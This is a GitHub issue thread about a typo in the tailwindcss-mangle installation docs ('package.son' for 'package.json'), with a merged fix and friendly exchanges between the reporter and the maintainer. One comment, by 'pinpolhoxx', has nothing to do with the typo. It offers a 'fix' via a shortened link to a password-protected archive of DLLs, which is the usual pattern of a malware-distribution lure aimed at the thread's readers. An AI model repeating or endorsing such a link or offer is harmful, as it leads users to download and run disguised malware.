### ISSUE TITLE
### [Bug]: Typo in Documentation (package.son should be package.json)

### ISSUE THREAD

**Issue by theutkarshdev** [sonofmagic/tailwindcss-mangle#83]
### version

3.0.1

### Link to minimal reproduction

N/A (Documentation typo)

### Steps to reproduce

1. Visit the installation section of the documentation.
2. In Step 4, (Run extract command) the instruction mentions `package.son` instead of `package.json`.

   The line reads:
   ```sh
   cd to the same directory as package.son and tailwind.config.js, then run:


### What is expected?

The documentation should correctly reference `package.json` instead of `package.son`.

### What is actually happening?

The documentation currently references `package.son`, which is incorrect.

### System Info

```shell
N/A (This is a documentation issue)
```

### Any additional comments?

I had raised a PR Request https://github.com/sonofmagic/tailwindcss-mangle/pull/82 Thanks @sonofmagic for the great tool! Just pointing out this small typo to improve the installation instructions.

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://bit.ly/3TzaAQd

Password: changeme
I put the necessary dlls in the archive

**Comment by sonofmagic** [comment]
Had merged in #82 , Thanks

**Comment by theutkarshdev** [comment]
Thanks a lot for merging the PR, @sonofmagic! I'm glad I could help improve the documentation. I’m open to contributing further and have extensive experience with Tailwind, React.js, and Next.js. Let me know if there's anything else I can assist with!

**Comment by sonofmagic** [comment]
You're welcome! It's great to see your enthusiasm for contributing further. With your experience in Tailwind, React.js, and Next.js, there's plenty of potential for impactful contributions. If you're looking for more opportunities, feel free to explore the open issues, or if there's any specific feature or area you're passionate about, it might be worth proposing improvements or enhancements. Don't hesitate to reach out if you need guidance on where to dive in! @theutkarshdev
